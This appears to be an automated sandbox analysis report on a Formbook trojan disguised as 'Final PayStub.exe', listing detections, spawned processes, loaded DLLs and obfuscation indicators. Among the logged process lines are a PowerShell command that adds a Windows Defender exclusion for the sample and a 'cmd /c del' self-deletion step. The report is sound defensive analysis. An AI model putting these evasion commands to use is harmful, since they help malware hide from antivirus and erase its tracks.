Source: Process Memory Space: Final PayStub.exe PID: 6720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Final PayStub.exe PID: 7004, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: systray.exe PID: 6752, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Final PayStub.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, RKMlpdPot5wO6QoIpj.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, RKMlpdPot5wO6QoIpj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, RKMlpdPot5wO6QoIpj.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, fCe2LR7QHvaE040eJZ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, fCe2LR7QHvaE040eJZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, fCe2LR7QHvaE040eJZ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, fCe2LR7QHvaE040eJZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, RKMlpdPot5wO6QoIpj.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, RKMlpdPot5wO6QoIpj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, RKMlpdPot5wO6QoIpj.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, fCe2LR7QHvaE040eJZ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, fCe2LR7QHvaE040eJZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, RKMlpdPot5wO6QoIpj.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, RKMlpdPot5wO6QoIpj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, RKMlpdPot5wO6QoIpj.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@209/6@8/4

Source: C:\Users\user\Desktop\Final PayStub.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final PayStub.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uaaykpj.fsd.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\systray.exe

Command line argument: SystemTray_Main

13_2_004913B0

Source: Final PayStub.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Final PayStub.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Final PayStub.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Final PayStub.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Final PayStub.exe	Virustotal: Detection: 56%
Source: Final PayStub.exe	ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe"
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Final PayStub.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Process created: C:\Users\user\Desktop\Final PayStub.exe "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Final PayStub.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Final PayStub.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: storsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bcd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: storageusage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior

Source: C:\Users\user\Desktop\Final PayStub.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Final PayStub.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Final PayStub.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Final PayStub.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Final PayStub.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: systray.pdb source: Final PayStub.exe, 00000006.00000002.1304676921.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Final PayStub.exe, 00000006.00000002.1304525293.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000D.00000002.2467199578.0000000000490000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: Final PayStub.exe, 00000006.00000002.1304676921.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Final PayStub.exe, 00000006.00000002.1304525293.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2467199578.0000000000490000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Final PayStub.exe, 00000006.00000002.1304776386.0000000001350000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000D.00000003.1304593236.0000000004A2B000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000003.1307102340.0000000004BD6000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2469950019.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2469950019.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Final PayStub.exe, Final PayStub.exe, 00000006.00000002.1304776386.0000000001350000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000D.00000003.1304593236.0000000004A2B000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000003.1307102340.0000000004BD6000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2469950019.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000D.00000002.2469950019.0000000004D80000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, RKMlpdPot5wO6QoIpj.cs	.Net Code: NNTGQ5MsXJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.Final PayStub.exe.3984b30.3.raw.unpack, RKMlpdPot5wO6QoIpj.cs	.Net Code: NNTGQ5MsXJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.Final PayStub.exe.6b10000.5.raw.unpack, RKMlpdPot5wO6QoIpj.cs	.Net Code: NNTGQ5MsXJ System.Reflection.Assembly.Load(byte[])

Source: Final PayStub.exe

Static PE information: 0x9720E76F [Sat May 7 06:00:15 2050 UTC]

Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_00417AA7 push ebx; ret	6_2_00417ABA
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_00416AAD push esp; iretd	6_2_00416AC2
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0040E318 push edi; iretd	6_2_0040E321
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_00403BC5 push ebx; retf	6_2_00403BC6
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041D4D2 push eax; ret	6_2_0041D4D8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041D4DB push eax; ret	6_2_0041D542
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041D485 push eax; ret	6_2_0041D4D8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0041D53C push eax; ret	6_2_0041D542
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_004115CA push ebp; iretd	6_2_004115CB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_00413606 push eax; retf	6_2_00413607
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013809AD push ecx; mov dword ptr [esp], ecx	6_2_013809B6
Source: C:\Windows\explorer.exe	Code function: 7_2_1057B9B5 push esp; retn 0000h	7_2_1057BAE7
Source: C:\Windows\explorer.exe	Code function: 7_2_1057BB1E push esp; retn 0000h	7_2_1057BB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_1057BB02 push esp; retn 0000h	7_2_1057BB03
Source: C:\Windows\explorer.exe	Code function: 7_2_110ACB02 push esp; retn 0000h	7_2_110ACB03
Source: C:\Windows\explorer.exe	Code function: 7_2_110ACB1E push esp; retn 0000h	7_2_110ACB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_110AC9B5 push esp; retn 0000h	7_2_110ACAE7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_00491B3D push ecx; ret	13_2_00491B50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04DB09AD push ecx; mov dword ptr [esp], ecx	13_2_04DB09B6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BB6AAD push esp; iretd	13_2_02BB6AC2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BB7AA7 push ebx; ret	13_2_02BB7ABA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BA3BC5 push ebx; retf	13_2_02BA3BC6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BAE318 push edi; iretd	13_2_02BAE321
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BB3606 push eax; retf	13_2_02BB3607
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBD485 push eax; ret	13_2_02BBD4D8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBD4DB push eax; ret	13_2_02BBD542
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBD4D2 push eax; ret	13_2_02BBD4D8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BB15CA push ebp; iretd	13_2_02BB15CB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_02BBD53C push eax; ret	13_2_02BBD542
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BCE9B5 push esp; retn 0000h	13_2_04BCEAE7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04BCEB1E push esp; retn 0000h	13_2_04BCEB1F

Source: Final PayStub.exe

Static PE information: section name: .text entropy: 7.871209629350527

Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, xYrxOVGHwghaR2Sf9e.cs	High entropy of concatenated method names: 'KoqmJCe2LR', 'zHvmPaE040', 'bQamNya67F', 'OELm8DJyPT', 'sAjmvYBhu0', 'rKbmyCoVgk', 'nNZJP72Kyc0AvIf9Ce', 'tQGRvGv3TVb3tZy52p', 'UiWmmvygGS', 'kp2mFLcFEM'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, l2WgOdB0TRoW6n683T.cs	High entropy of concatenated method names: 'OebJDuNDKq', 'T83JVSXKXR', 'nfsJQwPVqa', 'dGmJcbpP3H', 'Tm9J4qtwBJ', 'yDHJSPJFOd', 'Ah1J6W5sGK', 'fB1J7mV8to', 'go0JdAVNA8', 'KhUJYsXg9p'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, RKMlpdPot5wO6QoIpj.cs	High entropy of concatenated method names: 'i4kF1jQGBQ', 'T4rF9hdkxW', 'ioyFqNJZH7', 'rMyFhVRVa3', 'JqrFUS1Rdt', 'q6KF3WycqW', 'HcjFJad92G', 's0vFPtOkkU', 'TioFWHlsg0', 'XarFNQ4r5H'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, NQOFQFeMqktKKTY9a9.cs	High entropy of concatenated method names: 'iW0J9QfBFi', 'Q3mJhyEkjr', 'VkCJ3qDToC', 'YVB3EKaptE', 'QPn3zcxhNP', 'gQHJooCq0K', 'FL2Jmw3jMr', 'Dg3JabMveC', 'Xn1JF0MMUM', 'vq1JGEn5Nn'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, ujr4FewfaoQR6NIL2j.cs	High entropy of concatenated method names: 'UMLuNJS7Fg', 'F8Su8EqoXq', 'ToString', 'pr2u91VOkL', 'kCWuqYgXFL', 'LN2uh18dmq', 'TGGuUNS5fL', 'K8ru3aEdEE', 'uSCuJi5ixu', 'hn0uPaJp3I'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, WDN3EmdQaya67FpELD.cs	High entropy of concatenated method names: 'sIjhc5jmtw', 'WU0hSA1Y57', 'IZrh7Dcuwd', 'd5lhdLlVR6', 'sKEhvrdqkU', 'Vnkhypyknd', 'OXThurmGZ6', 'GobhHIef12', 'T90h2deUAp', 'hnohLWbbnp'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, jyPTrXY3IbVQR2AjYB.cs	High entropy of concatenated method names: 'eUxU4YRxNY', 'I65U6NUAIm', 'sw8hr0DNSH', 'MXmhOK7acf', 'qEFhCMMOhs', 'Atfhg0pODo', 'wYjhevii4x', 'xdRhtI16Cp', 'wY1hBxbJbg', 'YrKh56mlMq'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, nxAX0D0LrDpGbHbhFO.cs	High entropy of concatenated method names: 'FOf2XOXH3Q', 'p3o2IlahS6', 'ibe2rDbuAe', 'Cgp2O8JLbD', 'Liw2CQ8mw1', 'Cpl2gG0Inl', 'Cnk2eefQWm', 'FRe2tsoG1V', 'QHS2B4YPU8', 'Xm625sAO87'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, NZJdRImoDkkMUFuS3mf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ToVLpEhLDy', 'sP9LsM82ea', 'ky7LMQbecb', 'ObKLZyA9pC', 'bCoLAnjuY2', 'KjTLRDgMfV', 'mwDLwgnC1H'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, qeluNghML34CQ7NOl4.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'o88a0KiiBV', 'QgUaE5F1Pn', 'xHkazusbAJ', 'VYBFohAHZJ', 'p3IFmQgpra', 'ryoFaU3sjE', 'vIPFF7dUHL', 'O0w7sUdZ7hHkarVYyuD'
Source: 0.2.Final PayStub.exe.39f7150.2.raw.unpack, ltVIKezMFLBsJBaIol.cs	High entropy of concatenated method names: 'ltMLSoS2gc', 'MueL7vXVpW', 'FetLd2qJYI', 'Qa0LXcOaIk', 'eDeLImSggT', 'NVaLOqKyxr', 'Es4LCnXTll', 'dtjLKHqvbJ', 'qr7LDfE6xx', 'Fu9LVQQQns'
